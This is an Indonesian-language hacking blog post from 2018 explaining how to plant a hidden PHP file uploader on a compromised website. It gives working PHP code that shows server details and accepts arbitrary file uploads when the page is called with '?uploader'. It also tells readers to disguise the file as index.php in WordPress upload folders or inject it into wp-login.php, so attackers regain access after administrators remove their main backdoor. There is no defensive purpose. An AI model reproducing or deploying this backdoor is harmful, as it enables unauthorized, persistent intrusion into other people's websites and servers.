News Ticker

Cara Memasang Script Hidden Uploader di Website

By Black Apk - Thursday, November 22, 2018 No Comments
Cara Memasang Script Hidden Uploader di Website -  Kali ini kita akan bahas memasang Script Hidden Uploader pada website Target kita agar tidak kehilangan akses.

Hidden Uploader Php Script
Biasanya digunakan untuk menyembunyikan uploader kita jadi saya biasanya menamai file tersebut index.php. Langsung saja copy file berikut :
<?php
if(isset($_GET["uploader"]))
 {
  echo"<font color=#ffffff>".php_uname()."";
  print "\n";$disable_functions = @ini_get("disable_functions"); 
  echo "<br>DisablePHP=".$disable_functions; print "\n"; 
  echo"<br><form method=post enctype=multipart/form-data>"; 
  echo"<input type=file name=f><input name=k type=submit id=k value=upload><br>"; 
    if($_POST["k"]==upload)
{ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>".$_FILES["f"]["name"];
}else{
echo"<b>Gagal uploa sayang";
}
} 
}
Misal kita menemukan target yang index.php-nya kosong contoh seperti berikut : 
http://target.com/wp-content/uploads
Lalu kita Upload file hidden uploader tadi yang kita namai index.php pada dir tempat yg index.php- kosong. Lalu kita buka:
http://target.com/wp-content/uploads/index.php
Akan terlihat kosong blank, untuk memanggil uploadernya, masukan query pada url nya menjadi seperti berikut:
http://target.com/wp-content/uploads/index.php?uploader
Maka akan terlihat uploadernya.
script hidden uploader backdoor
Metode ini biasanya digunakan untuk cadangan backdoor, jika backdoor kita sudah dihapus oleh administratornya kita masih bisa upload backdoor baru.

Oiya script uploader ini kuga bisa di masukan pada script lainnya, Tempat favorit saya adalah di wp-login.php jika targetnya wordpress ya. Jika targetnya beda kalian masukan di bagian login admin saja.


POPULAR ARTICLES :


No Comment to " Cara Memasang Script Hidden Uploader di Website "